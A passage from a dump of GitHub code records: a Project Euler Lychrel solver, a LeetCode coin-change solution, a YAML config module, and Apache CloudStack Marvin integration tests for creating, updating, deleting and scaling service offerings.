util\n\n_lychrels = {}\ndef is_lychrel(n, iteration):\n # consider it lychrel if it's the 50th iteration\n if iteration >= 50:\n _lychrels[n] = True\n # if it's a palindrome and it's the sum of another number and its reverse,\n # return False\n elif iteration > 0 and util.is_palindrome(str(n)):\n _lychrels[n] = False\n # if we already know this to be a lychrel number, we return True\n elif _lychrels.get(n):\n pass\n # otherwise, we have no idea yet\n else:\n # let's try this again\n _lychrels[n] = is_lychrel(n + int(str(n)[::-1]), iteration + 1)\n return _lychrels[n]\n\ndef solve():\n count = 0\n for n in range(9999, 0, -1):\n if is_lychrel(n, 0):\n count += 1\n #print n, \"is lychrel\"\n print(count, \"total lychrels\")\n\nif __name__ == \"__main__\":\n solve()\n #pass\n","repo_name":"indraastra/puzzles","sub_path":"euler/prob055.py","file_name":"prob055.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7699671078","text":"class Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n \n def dfs(coins, idx, amount, dp):\n \n if amount == 0:\n return 0\n \n if idx >= len(coins):\n return float('inf')\n \n key = \"{}-{}\".format(idx, amount)\n \n if key not in dp:\n include = float('inf')\n if coins[idx] <= amount:\n temp = dfs(coins, idx, amount - coins[idx], dp)\n if temp != float('inf'):\n include = 1 + temp\n\n skip = dfs(coins, idx+1, amount, dp)\n\n dp[key] = min(include, skip)\n \n return dp[key]\n \n dp = {}\n ans = dfs(coins, 0, amount, dp)\n return ans if ans != float('inf') else -1","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70932122651","text":"import os\nimport yaml\n\nclass Section(object):\n def __init__(self, nm, parent=None):\n self.name = nm\n self.parent = parent\n self.attrs = {}\n self.sections = {}\n\n def _get_subsection(self, nm):\n return self.sections.get(nm)\n\n def _add_subsection(self, s):\n self.sections[s.name] = s\n\n def update_attrs(self, attrs):\n self.attrs.update(attrs)\n\n def _validate(self, c):\n for s in self.sections.values():\n c = self.config.get(s.name, {})\n if not isinstance(c, dict):\n raise TypeError(\"Section is not dict\")\n s._validate(c)\n\n for nm, a in self.attrs.items():\n a.validate(c, nm)\n\n def get_attribute(self, nm, c):\n if nm not in self.attrs:\n raise KeyError(nm)\n\n self.attrs[nm].get_from(c, nm)\n\nclass Config(object):\n def __init__(self, path=None):\n if path is None:\n if 'INTRUSTD_APPLIANCE_DIR' in os.environ:\n self.path = os.path.join(os.environ['INTRUSTD_APPLIANCE_DIR'], 'config.yaml')\n else:\n raise TypeError(\"expected 'path' argument or 'INTRUSTD_APPLIANCE_DIR' environment variable\")\n\n self.sections = {}\n\n def open(self):\n try:\n with open(path, \"rt\") as f:\n self.config = yaml.load(f)\n except FileNotFoundError:\n self.config = {}\n\n self._validate()\n\n def _validate(self):\n for s in self.sections.values():\n c = self.config.get(s.name, {})\n if not isinstance(c, dict):\n raise TypeError(\"Section is not dict\")\n s._validate(c)\n\n def _split_key(self, key):\n return key.split('.')\n\n def _is_internal_identifier(self, key):\n return key.startswith('_')\n\n def __getitem__(self, key):\n if not hasattr(self, 'config'):\n raise TypeError(\"Config not open()ed\")\n\n key = self._split_key(key)\n section = key[:-1]\n\n cur = self.config\n cur_section = self\n p = []\n for s in section:\n p.append(s)\n s = cur_section._get_subsection(s)\n if s is None:\n raise KeyError('.'.join(p))\n\n cur = cur.get(s.name, {})\n\n return cur_section.get_attribute(key, cur)\n\n def _make_section(self, nms):\n cur = self\n for nm in nms:\n cur = self._get_subsection(nm)\n if cur is None:\n self._add_subsection(Section(nm, parent=cur))\n cur = self._get_subsection(nm)\n return cur\n\n def _get_subsection(self, nm):\n return self.sections.get(nm)\n\n def _add_subsection(self, s):\n self.sections[s.name] = s\n\n def section(self, nm):\n nm = self._split_key(nm)\n\n def mksection(cls):\n section = self._make_section(nm)\n attrs = [k for k in dir(cls) if not self._is_internal_identifier(k)]\n section.update_attrs(dict((attr, getattr(cls, attr)) for attr in attrs))\n\n return mksection\n","repo_name":"intrustd/admin","sub_path":"intrustd/admin/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33779635425","text":"from marvin.codes import FAILED\nfrom marvin.cloudstackTestCase import cloudstackTestCase\nfrom marvin.cloudstackAPI import (scaleVirtualMachine,\n updateServiceOffering)\nfrom marvin.lib.utils import (isAlmostEqual,\n cleanup_resources,\n random_gen)\nfrom marvin.lib.base import (ServiceOffering,\n Configurations,\n DiskOffering,\n Account,\n StoragePool,\n VirtualMachine)\nfrom marvin.lib.common import (list_service_offering,\n list_virtual_machines,\n get_domain,\n get_zone,\n get_test_template,\n list_hosts)\nfrom nose.plugins.attrib import attr\n\nimport time\nfrom marvin.sshClient import SshClient\nfrom marvin.lib.decoratorGenerators import skipTestIf\n\n_multiprocess_shared_ = True\n\n\nclass TestCreateServiceOffering(cloudstackTestCase):\n\n def setUp(self):\n self.apiclient = self.testClient.getApiClient()\n self.dbclient = self.testClient.getDbConnection()\n self.cleanup = []\n self.services = self.testClient.getParsedTestDataConfig()\n\n def tearDown(self):\n try:\n # Clean up, terminate the created templates\n cleanup_resources(self.apiclient, self.cleanup)\n\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\", \"diskencrypt\"],\n required_hardware=\"false\")\n def test_01_create_service_offering(self):\n \"\"\"Test to create service offering\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n # 2. The Cloud Database contains the valid information\n\n service_offering = ServiceOffering.create(\n self.apiclient,\n self.services[\"service_offerings\"][\"tiny\"]\n )\n self.cleanup.append(service_offering)\n\n self.debug(\n \"Created service offering with ID: %s\" %\n service_offering.id)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=service_offering.id\n )\n self.assertEqual(\n isinstance(list_service_response, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is created\"\n )\n\n self.assertEqual(\n list_service_response[0].cpunumber,\n self.services[\"service_offerings\"][\"tiny\"][\"cpunumber\"],\n \"Check server id in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].cpuspeed,\n self.services[\"service_offerings\"][\"tiny\"][\"cpuspeed\"],\n \"Check cpuspeed in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].displaytext,\n self.services[\"service_offerings\"][\"tiny\"][\"displaytext\"],\n \"Check server displaytext in createServiceOfferings\"\n )\n self.assertEqual(\n list_service_response[0].memory,\n self.services[\"service_offerings\"][\"tiny\"][\"memory\"],\n \"Check memory in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].name,\n self.services[\"service_offerings\"][\"tiny\"][\"name\"],\n \"Check name in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].encryptroot,\n False,\n \"Ensure encrypt is false by default\"\n )\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_02_create_iops_offering(self):\n \"\"\"Test to create service io burst offering\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n # 2. The Cloud Database contains the valid information\n\n\n\n svcs = self.services[\"service_offerings\"][\"tiny\"]\n kws = {}\n\n for key in self.services[\"ioburst\"]:\n if str(key).startswith(\"bytes\") or str(key).startswith(\"iops\"):\n kws[key] = self.services[\"ioburst\"][key]\n else:\n svcs[key] = self.services[\"ioburst\"][key]\n\n service_offering = ServiceOffering.create(\n self.apiclient,\n svcs,\n None,\n None,\n **kws\n )\n self.cleanup.append(service_offering)\n\n self.debug(\n \"Created service offering with ID: %s\" %\n service_offering.id)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=service_offering.id\n )\n self.assertEqual(\n isinstance(list_service_response, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is created\"\n )\n\n for key in kws:\n k = str(key)\n mapped = 'disk' + k[:1].upper() + k[1:]\n self.assertEqual(\n list_service_response[0][mapped],\n kws[key],\n \"Check \" + str(key) + \" => \" + str(mapped) + \" in createServiceOffering\"\n )\n\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_03_create_service_offering_with_cache_mode_type(self):\n \"\"\"Test to create service offering with each one of the valid cache mode types : none, writeback and writethrough\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n # 2. The Cloud Database contains the valid information\n\n cache_mode_types=[\"none\", \"writeback\", \"writethrough\"]\n for i in range(3):\n service_offering = ServiceOffering.create(\n self.apiclient,\n self.services[\"service_offerings\"][\"tiny\"],\n cacheMode=cache_mode_types[i]\n )\n self.cleanup.append(service_offering)\n\n self.debug(\n \"Created service offering with ID: %s\" %\n service_offering.id)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=service_offering.id\n )\n self.assertEqual(\n isinstance(list_service_response, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is created\"\n )\n\n self.assertEqual(\n list_service_response[0].cpunumber,\n self.services[\"service_offerings\"][\"tiny\"][\"cpunumber\"],\n \"Check server id in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].cpuspeed,\n self.services[\"service_offerings\"][\"tiny\"][\"cpuspeed\"],\n \"Check cpuspeed in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].displaytext,\n self.services[\"service_offerings\"][\"tiny\"][\"displaytext\"],\n \"Check server displaytext in createServiceOfferings\"\n )\n self.assertEqual(\n list_service_response[0].memory,\n self.services[\"service_offerings\"][\"tiny\"][\"memory\"],\n \"Check memory in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].name,\n self.services[\"service_offerings\"][\"tiny\"][\"name\"],\n \"Check name in createServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].cacheMode,\n cache_mode_types[i],\n \"Check cacheMode in createServiceOffering\"\n )\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_04_create_service_offering_with_invalid_cache_mode_type(self):\n \"\"\"Test to create service offering with invalid cache mode type\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n # 2. The Cloud Database contains the valid information\n\n with self.assertRaises(Exception):\n service_offering = ServiceOffering.create(\n self.apiclient,\n self.services[\"service_offerings\"][\"tiny\"],\n cacheMode=\"invalid_cache_mode_type\"\n )\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\",\n \"diskencrypt\"],\n required_hardware=\"false\")\n def test_05_create_service_offering_with_root_encryption_type(self):\n \"\"\"Test to create service offering with root encryption\"\"\"\n\n # Validate the following:\n # 1. createServiceOfferings should return a valid information\n # for newly created offering\n\n service_offering = ServiceOffering.create(\n self.apiclient,\n self.services[\"service_offerings\"][\"tiny\"],\n name=\"tiny-encrypted-root\",\n encryptRoot=True\n )\n self.cleanup.append(service_offering)\n\n self.debug(\n \"Created service offering with ID: %s\" %\n service_offering.id)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=service_offering.id\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is created\"\n )\n\n self.assertEqual(\n list_service_response[0].encryptroot,\n True,\n \"Check encrypt root is true\"\n )\n return\n\n\nclass TestServiceOfferings(cloudstackTestCase):\n\n def setUp(self):\n self.apiclient = self.testClient.getApiClient()\n self.dbclient = self.testClient.getDbConnection()\n self.cleanup = []\n\n def tearDown(self):\n try:\n # Clean up, terminate the created templates\n cleanup_resources(self.apiclient, self.cleanup)\n\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n\n return\n\n @classmethod\n def setUpClass(cls):\n testClient = super(TestServiceOfferings, cls).getClsTestClient()\n cls.apiclient = testClient.getApiClient()\n cls.services = testClient.getParsedTestDataConfig()\n cls.hypervisor = testClient.getHypervisorInfo()\n\n domain = get_domain(cls.apiclient)\n cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())\n cls.services['mode'] = cls.zone.networktype\n\n cls.service_offering_1 = ServiceOffering.create(\n cls.apiclient,\n cls.services[\"service_offerings\"][\"tiny\"]\n )\n cls.service_offering_2 = ServiceOffering.create(\n cls.apiclient,\n cls.services[\"service_offerings\"][\"tiny\"]\n )\n cls.template = get_test_template(\n cls.apiclient,\n cls.zone.id,\n cls.hypervisor\n )\n if cls.template == FAILED:\n assert False, \"get_test_template() failed to return template\"\n\n # Set Zones and disk offerings\n cls.services[\"small\"][\"zoneid\"] = cls.zone.id\n cls.services[\"small\"][\"template\"] = cls.template.id\n\n\n # Create VMs, NAT Rules etc\n cls.account = Account.create(\n cls.apiclient,\n cls.services[\"account\"],\n domainid=domain.id\n )\n\n cls.small_offering = ServiceOffering.create(\n cls.apiclient,\n cls.services[\"service_offerings\"][\"small\"]\n )\n\n cls.medium_offering = ServiceOffering.create(\n cls.apiclient,\n cls.services[\"service_offerings\"][\"medium\"]\n )\n cls.medium_virtual_machine = VirtualMachine.create(\n cls.apiclient,\n cls.services[\"small\"],\n accountid=cls.account.name,\n domainid=cls.account.domainid,\n serviceofferingid=cls.medium_offering.id,\n mode=cls.services[\"mode\"]\n )\n cls._cleanup = [\n cls.small_offering,\n cls.medium_offering,\n cls.account\n ]\n return\n\n @classmethod\n def tearDownClass(cls):\n try:\n cls.apiclient = super(\n TestServiceOfferings,\n cls).getClsTestClient().getApiClient()\n # Clean up, terminate the created templates\n cleanup_resources(cls.apiclient, cls._cleanup)\n\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_02_edit_service_offering(self):\n \"\"\"Test to update existing service offering\"\"\"\n\n # Validate the following:\n # 1. updateServiceOffering should return\n # a valid information for newly created offering\n\n # Generate new name & displaytext from random data\n random_displaytext = random_gen()\n random_name = random_gen()\n random_tag = random_gen()\n random_hosttag = random_gen()\n\n self.debug(\"Updating service offering with ID: %s\" %\n self.service_offering_1.id)\n\n cmd = updateServiceOffering.updateServiceOfferingCmd()\n # Add parameters for API call\n cmd.id = self.service_offering_1.id\n cmd.displaytext = random_displaytext\n cmd.name = random_name\n cmd.storagetags = random_tag\n cmd.hosttags = random_hosttag\n self.apiclient.updateServiceOffering(cmd)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=self.service_offering_1.id\n )\n self.assertEqual(\n isinstance(list_service_response, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertNotEqual(\n len(list_service_response),\n 0,\n \"Check Service offering is updated\"\n )\n\n self.assertEqual(\n list_service_response[0].displaytext,\n random_displaytext,\n \"Check server displaytext in updateServiceOffering\"\n )\n self.assertEqual(\n list_service_response[0].name,\n random_name,\n \"Check server name in updateServiceOffering\"\n )\n\n self.assertEqual(\n list_service_response[0].storagetags,\n random_tag,\n \"Check storage tags in updateServiceOffering\"\n )\n\n self.assertEqual(\n list_service_response[0].hosttags,\n random_hosttag,\n \"Check host tags in updateServiceOffering\"\n )\n return\n\n @attr(\n tags=[\n \"advanced\",\n \"advancedns\",\n \"smoke\",\n \"basic\",\n \"eip\",\n \"sg\"],\n required_hardware=\"false\")\n def test_03_delete_service_offering(self):\n \"\"\"Test to delete service offering\"\"\"\n\n # Validate the following:\n # 1. deleteServiceOffering should return\n # a valid information for newly created offering\n\n self.debug(\"Deleting service offering with ID: %s\" %\n self.service_offering_2.id)\n\n self.service_offering_2.delete(self.apiclient)\n\n list_service_response = list_service_offering(\n self.apiclient,\n id=self.service_offering_2.id\n )\n\n self.assertEqual(\n list_service_response,\n None,\n \"Check if service offering exists in listDiskOfferings\"\n )\n\n return\n\n @attr(tags=[\"advanced\", \"advancedns\", \"smoke\"], required_hardware=\"true\")\n def test_04_change_offering_small(self):\n \"\"\"Test to change service to a small capacity\n \"\"\"\n # Validate the following\n # 1. Log in to the Vm .We should see that the CPU and memory Info of\n # this Vm matches the one specified for \"Small\" service offering.\n # 2. Using listVM command verify that this Vm\n # has Small service offering Id.\n\n if self.hypervisor.lower() == \"lxc\":\n self.skipTest(\"Skipping this test for {} due to bug CS-38153\".format(self.hypervisor))\n try:\n self.medium_virtual_machine.stop(self.apiclient)\n\n timeout = self.services[\"timeout\"]\n\n while True:\n time.sleep(self.services[\"sleep\"])\n\n # Ensure that VM is in stopped state\n list_vm_response = list_virtual_machines(\n self.apiclient,\n id=self.medium_virtual_machine.id\n )\n\n if isinstance(list_vm_response, list):\n vm = list_vm_response[0]\n if vm.state == 'Stopped':\n self.debug(\"VM state: %s\" % vm.state)\n break\n\n if timeout == 0:\n raise Exception(\n \"Failed to stop VM (ID: %s) in change service offering\" % vm.id)\n\n timeout = timeout - 1\n except Exception as e:\n self.fail(\"Failed to stop VM: %s\" % e)\n\n cmd = scaleVirtualMachine.scaleVirtualMachineCmd()\n cmd.id = self.medium_virtual_machine.id\n cmd.serviceofferingid = self.small_offering.id\n self.apiclient.scaleVirtualMachine(cmd)\n\n self.debug(\"Starting VM - ID: %s\" % self.medium_virtual_machine.id)\n self.medium_virtual_machine.start(self.apiclient)\n # Ensure that VM is in running state\n list_vm_response = list_virtual_machines(\n self.apiclient,\n id=self.medium_virtual_machine.id\n )\n\n if isinstance(list_vm_response, list):\n vm = list_vm_response[0]\n if vm.state == 'Running':\n self.debug(\"VM state: %s\" % vm.state)\n else:\n raise Exception(\n \"Failed to start VM (ID: %s) after changing\\\n service offering\" % vm.id)\n\n try:\n ssh = self.medium_virtual_machine.get_ssh_client()\n except Exception as e:\n self.fail(\n \"SSH Access failed for %s: %s\" %\n (self.medium_virtual_machine.ipaddress, e)\n )\n\n cpuinfo = ssh.execute(\"cat /proc/cpuinfo\")\n cpu_cnt = len([i for i in cpuinfo if \"processor\" in i])\n # 'cpu MHz\\t\\t: 2660.499'\n cpu_speed = [i for i in cpuinfo if \"cpu MHz\" in i][0].split()[3]\n meminfo = ssh.execute(\"cat /proc/meminfo\")\n # MemTotal: 1017464 kB\n total_mem = [i for i in meminfo if \"MemTotal\" in i][0].split()[1]\n\n self.debug(\n \"CPU count: %s, CPU Speed: %s, Mem Info: %s\" % (\n cpu_cnt,\n cpu_speed,\n total_mem\n ))\n self.assertAlmostEqual(\n int(cpu_cnt),\n self.small_offering.cpunumber,\n \"Check CPU Count for small offering\"\n )\n self.assertAlmostEqual(\n list_vm_response[0].cpuspeed,\n self.small_offering.cpuspeed,\n \"Check CPU Speed for small offering\"\n )\n\n range = 25\n if self.hypervisor.lower() == \"hyperv\":\n range = 200\n # TODO: Find the memory allocated to VM on hyperv hypervisor using\n # powershell commands and use that value to equate instead of\n # manipulating range, currently we get the memory count much less\n # because of the UI component\n self.assertTrue(\n isAlmostEqual(int(int(total_mem) / 1024),\n int(self.small_offering.memory),\n range=range\n ),\n \"Check Memory(kb) for small offering\"\n )\n return\n\n @attr(tags=[\"advanced\", \"advancedns\", \"smoke\"], required_hardware=\"true\")\n def test_05_disk_offering_strictness_true(self):\n \"\"\"Test to see change service offering is not possible when disk offering strictness is set to true\n \"\"\"\n # Validate the following\n # 1. Create service offering linked a disk offering and disk offering strictness is true\n # 2. Create a VM with that service offering\n # 3. Create another service offering with a different disk offering\n # 4. Try change service offering for VM and it will fail since disk offering strictness is true (not allowed to change the disk offering)\n\n if self.hypervisor.lower() == \"lxc\":\n self.skipTest(\"Skipping this test for {} due to bug CS-38153\".format(self.hypervisor))\n offering_data = {\n 'displaytext': 'TestDiskOfferingStrictnessTrue',\n 'cpuspeed': 512,\n 'cpunumber': 2,\n 'name': 'TestDiskOfferingStrictnessTrue',\n 'memory': 1024,\n 'diskofferingstrictness': True\n }\n\n self.serviceOfferingWithDiskOfferingStrictnessTrue = ServiceOffering.create(\n self.apiclient,\n offering_data,\n )\n self._cleanup.append(self.serviceOfferingWithDiskOfferingStrictnessTrue)\n\n self.virtual_machine_with_diskoffering_strictness_true = VirtualMachine.create(\n self.apiclient,\n self.services[\"small\"],\n accountid=self.account.name,\n domainid=self.account.domainid,\n serviceofferingid=self.serviceOfferingWithDiskOfferingStrictnessTrue.id,\n mode=self.services[\"mode\"]\n )\n\n try:\n self.virtual_machine_with_diskoffering_strictness_true.stop(self.apiclient)\n\n timeout = self.services[\"timeout\"]\n\n while True:\n time.sleep(self.services[\"sleep\"])\n\n # Ensure that VM is in stopped state\n list_vm_response = list_virtual_machines(\n self.apiclient,\n id=self.virtual_machine_with_diskoffering_strictness_true.id\n )\n\n if isinstance(list_vm_response, list):\n vm = list_vm_response[0]\n if vm.state == 'Stopped':\n self.debug(\"VM state: %s\" % vm.state)\n break\n\n if timeout == 0:\n raise Exception(\n \"Failed to stop VM (ID: %s) in change service offering\" % vm.id)\n\n timeout = timeout - 1\n except Exception as e:\n self.fail(\"Failed to stop VM: %s\" % e)\n\n offering_data = {\n 'displaytext': 'TestDiskOfferingStrictnessTrue2',\n 'cpuspeed': 1000,\n 'cpunumber': 2,\n 'name': 'TestDiskOfferingStrictnessTrue2',\n 'memory': 1024,\n 'diskofferingstrictness': True\n }\n\n self.serviceOfferingWithDiskOfferingStrictnessTrue2 = ServiceOffering.create(\n self.apiclient,\n offering_data,\n )\n self._cleanup.append(self.serviceOfferingWithDiskOfferingStrictnessTrue2)\n cmd = scaleVirtualMachine.scaleVirtualMachineCmd()\n cmd.id = self.virtual_machine_with_diskoffering_strictness_true.id\n cmd.serviceofferingid = self.serviceOfferingWithDiskOfferingStrictnessTrue2.id\n\n with self.assertRaises(Exception) as e:\n self.apiclient.scaleVirtualMachine(cmd)\n self.debug(\"Upgrade VM with new service offering having different disk offering operation failed as expected with exception: %s\" %\n e.exception)\n return\n\n @attr(tags=[\"advanced\", \"advancedns\", \"smoke\"], required_hardware=\"true\")\n def test_06_disk_offering_strictness_false(self):\n \"\"\"Test to see change service offering is possible when disk offering strictness is set to false\n \"\"\"\n # Validate the following\n # 1. Create service offering linked a disk offering and disk offering strictness is false\n # 2. Create a VM with that service offering\n # 3. Create another service offering with a different disk offering and disk offering strictness is false\n # 4. Try change service offering for VM should succeed\n\n if self.hypervisor.lower() == \"lxc\":\n self.skipTest(\"Skipping this test for {} due to bug CS-38153\".format(self.hypervisor))\n self.storeCloneValues = {}\n if self.hypervisor.lower() == \"vmware\":\n self.fullClone = Configurations.list(self.apiclient, name=\"vmware.create.full.clone\")\n assert isinstance(self.fullClone, list), \"Config list not retrieved for vmware.create.full.clone\"\n allStoragePools = StoragePool.list(\n self.apiclient\n )\n for pool in allStoragePools:\n self.storeCloneValues[pool.id] = Configurations.list(self.apiclient, name=\"vmware.create.full.clone\", storageid=pool.id)[0].value.lower()\n self.updateVmwareCreateFullCloneSetting(False)\n\n offering_data = {\n 'displaytext': 'TestDiskOfferingStrictnessFalse',\n 'cpuspeed': 512,\n 'cpunumber': 2,\n 'name': 'TestDiskOfferingStrictnessFalse',\n 'memory': 1024,\n 'diskofferingstrictness': False\n }\n\n self.serviceOfferingWithDiskOfferingStrictnessFalse = ServiceOffering.create(\n self.apiclient,\n offering_data,\n )\n self._cleanup.append(self.serviceOfferingWithDiskOfferingStrictnessFalse)\n\n self.virtual_machine_with_diskoffering_strictness_false = VirtualMachine.create(\n self.apiclient,\n self.services[\"small\"],\n accountid=self.account.name,\n domainid=self.account.domainid,\n serviceofferingid=self.serviceOfferingWithDiskOfferingStrictnessFalse.id,\n mode=self.services[\"mode\"]\n )\n\n try:\n self.virtual_machine_with_diskoffering_strictness_false.stop(self.apiclient)\n\n timeout = self.services[\"timeout\"]\n\n while True:\n time.sleep(self.services[\"sleep\"])\n\n # Ensure that VM is in stopped state\n list_vm_response = list_virtual_machines(\n self.apiclient,\n id=self.virtual_machine_with_diskoffering_strictness_false.id\n )\n\n if isinstance(list_vm_response, list):\n vm = list_vm_response[0]\n if vm.state == 'Stopped':\n self.debug(\"VM state: %s\" % vm.state)\n break\n\n if timeout == 0:\n raise Exception(\n \"Failed to stop VM (ID: %s) in change service offering\" % vm.id)\n\n timeout = timeout - 1\n except Exception as e:\n self.fail(\"Failed to stop VM: %s\" % e)\n\n self.disk_offering2 = DiskOffering.create(\n self.apiclient,\n self.services[\"disk_offering\"],\n )\n self._cleanup.append(self.disk_offering2)\n offering_data = {\n 'displaytext': 'TestDiskOfferingStrictnessFalse2',\n 'cpuspeed': 1000,\n 'cpunumber': 2,\n 'name': 'TestDiskOfferingStrictnessFalse2',\n 'memory': 1024,\n 'diskofferingstrictness': False,\n 'diskofferingid': self.disk_offering2.id\n }\n\n self.serviceOfferingWithDiskOfferingStrictnessFalse2 = ServiceOffering.create(\n self.apiclient,\n offering_data,\n )\n self._cleanup.append(self.serviceOfferingWithDiskOfferingStrictnessFalse2)\n cmd = scaleVirtualMachine.scaleVirtualMachineCmd()\n cmd.id = self.virtual_machine_with_diskoffering_strictness_false.id\n cmd.serviceofferingid = self.serviceOfferingWithDiskOfferingStrictnessFalse2.id\n self.apiclient.scaleVirtualMachine(cmd)\n\n list_vm_response = VirtualMachine.list(\n self.apiclient,\n id=self.virtual_machine_with_diskoffering_strictness_false.id\n )\n\n vm_response = list_vm_response[0]\n self.assertEqual(\n vm_response.id,\n self.virtual_machine_with_diskoffering_strictness_false.id,\n \"Check virtual machine ID of upgraded VM\"\n )\n\n self.assertEqual(\n vm_response.serviceofferingid,\n self.serviceOfferingWithDiskOfferingStrictnessFalse2.id,\n \"Check service offering of the VM\"\n )\n\n if self.hypervisor.lower() == \"vmware\":\n self.updateVmwareCreateFullCloneSetting(True)\n\n return\n\n def updateVmwareCreateFullCloneSetting(self, tearDown):\n if not tearDown:\n Configurations.update(self.apiclient,\n \"vmware.create.full.clone\",\n \"true\")\n allStoragePools = StoragePool.list(\n self.apiclient\n )\n for pool in allStoragePools:\n Configurations.update(self.apiclient,\n storageid=pool.id,\n name=\"vmware.create.full.clone\",\n value=\"true\")\n else:\n Configurations.update(self.apiclient,\n \"vmware.create.full.clone\",\n self.fullClone[0].value.lower())\n allStoragePools = StoragePool.list(\n self.apiclient\n )\n for pool in allStoragePools:\n Configurations.update(self.apiclient,\n storageid=pool.id,\n name=\"vmware.create.full.clone\",\n value=self.storeCloneValues[pool.id])\n\nclass TestCpuCapServiceOfferings(cloudstackTestCase):\n\n def setUp(self):\n self.apiclient = self.testClient.getApiClient()\n self.dbclient = self.testClient.getDbConnection()\n self.cleanup = []\n\n def tearDown(self):\n try:\n # Clean up, terminate the created templates\n cleanup_resources(self.apiclient, self.cleanup)\n\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n\n return\n\n def get_ssh_client(self, id, public_ip, username, password, retries):\n \"\"\" Setup ssh client connection and return connection\n vm requires attributes public_ip, public_port, username, password \"\"\"\n\n try:\n ssh_client = SshClient(\n public_ip,\n 22,\n username,\n password,\n retries)\n\n except Exception as e:\n self.fail(\"Unable to create ssh connection: \" % e)\n\n self.assertIsNotNone(\n ssh_client, \"Failed to setup ssh connection to host=%s on public_ip=%s\" % (id, public_ip))\n\n return ssh_client\n\n @classmethod\n def setUpClass(cls):\n testClient = super(TestCpuCapServiceOfferings, cls).getClsTestClient()\n cls.apiclient = testClient.getApiClient()\n cls.services = testClient.getParsedTestDataConfig()\n cls.hypervisor = testClient.getHypervisorInfo()\n cls._cleanup = []\n cls.hypervisorNotSupported = False\n if cls.hypervisor.lower() not in [\"kvm\"]:\n cls.hypervisorNotSupported = True\n return\n\n domain = get_domain(cls.apiclient)\n cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())\n cls.services['mode'] = cls.zone.networktype\n\n template = get_test_template(cls.apiclient, cls.zone.id, cls.hypervisor)\n if template == FAILED:\n assert False, \"get_test_template() failed to return template\"\n\n cls.services[\"small\"][\"zoneid\"] = cls.zone.id\n cls.services[\"small\"][\"template\"] = template.id\n cls.services[\"small\"][\"hypervisor\"] = cls.hypervisor\n cls.hostConfig = cls.config.__dict__[\"zones\"][0].__dict__[\"pods\"][0].__dict__[\"clusters\"][0].__dict__[\"hosts\"][0].__dict__\n\n cls.account = Account.create(\n cls.apiclient,\n cls.services[\"account\"],\n domainid=domain.id\n )\n\n offering_data = {\n 'displaytext': 'TestOffering',\n 'cpuspeed': 512,\n 'cpunumber': 2,\n 'name': 'TestOffering',\n 'memory': 1024\n }\n\n cls.offering = ServiceOffering.create(\n cls.apiclient,\n offering_data,\n limitcpuuse=True\n )\n\n def getHost(self, hostId=None):\n response = list_hosts(\n self.apiclient,\n type='Routing',\n hypervisor='kvm',\n id=hostId\n )\n # Check if more than one kvm hosts are available in order to successfully configure host-ha\n if response and len(response) > 0:\n self.host = response[0]\n return self.host\n raise self.skipTest(\"Not enough KVM hosts found, skipping host-ha test\")\n\n cls.host = getHost(cls)\n\n cls.vm = VirtualMachine.create(\n cls.apiclient,\n cls.services[\"small\"],\n accountid=cls.account.name,\n domainid=cls.account.domainid,\n 